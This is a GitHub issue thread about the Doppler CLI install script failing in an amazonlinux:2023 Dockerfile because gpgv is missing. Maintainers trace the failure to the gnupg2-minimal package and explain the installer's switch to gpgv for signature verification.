[BUG] Dockerfile cannot find gpgv which causes install script to fail

Question

[BUG] Dockerfile cannot find gpgv which causes install script to fail

marytal opened this issue 10 months ago · 4 comments

Describe the bug
Running install script: RUN curl -Ls --tlsv1.2 --proto "=https" --retry 3 https://cli.doppler.com/install.sh | sh in Dockerfile

To Reproduce
Run the above install script in a Dockerfile with gnupg installed on the docker image:

RUN yum update -y && \
    yum install -y gnupg && \
    yum clean all

RUN curl -Ls --tlsv1.2 --proto "=https" --retry 3 https://cli.doppler.com/install.sh | sh

Expected behavior
Install successfully

Actual behavior
RUN command -v gpg works fine but RUN command -v gpgv doesn't work. It appears that we cannot install gpgv independently (see here) so it should work when gnupg is installed.

Fails with error: "ERROR: Unable to find gpg binary for signature verification"

Started failing when this was merged: #449

Screenshots
N/A

Desktop (please complete the following information):

Dockerfile linux/amd64 amazonlinux:2023

CLI Version:
N/A

Additional context
N/A

Any help appreciated!

Answer 1 · 2024-03-05T16:00:48.000Z

@marytal The problem here is that amazonlinux:2023 comes with the gnupg2-minimal package installed (this is also what it tries installing when you run yum install gnupg). gpgv comes in the full gnupg2 package. If you run sudo yum install --allowerasing gnupg2 on the container, you should end up with the required binaries.

Answer 2 · 2024-03-05T16:09:07.000Z

As a quick follow-up, keep in mind that you can also install via package manager by following the installation instructions on the RedHat/CentOS tab of our CLI installation docs.

Answer 3 · 2024-03-05T16:16:55.000Z

Also, to elaborate a bit on why we changed from gpg to gpgv in #449 – the reason for that is newer versions of gnupg are defaulting to using keyboxd for key storage. When keyboxd is enabled, the --no-default-keyring and --keyring flags are ignored by the gpg command. This broke signature verification in our installer. The standard gnupg package that we have as a dependency requirement when using the install script comes with gpgv, which is a small binary designed specifically for doing signature verifications and isn't impacted by keyboxd being in use. This allows us to continue verifying in the same way we were before (i.e., without us having to import our public key into the machine's keyring and then remove it after – leaving the potential that the key might end up permanently installed on the machine if the script were interrupted). In this situation, it (unfortunately) looks like AmazonLinux has mapped gnupg to gnupg2-minimal rather than gnupg2, which results in their container coming without gpgv by default.

Answer 4 · 2024-03-07T11:35:15.000Z

Thanks for your help! :)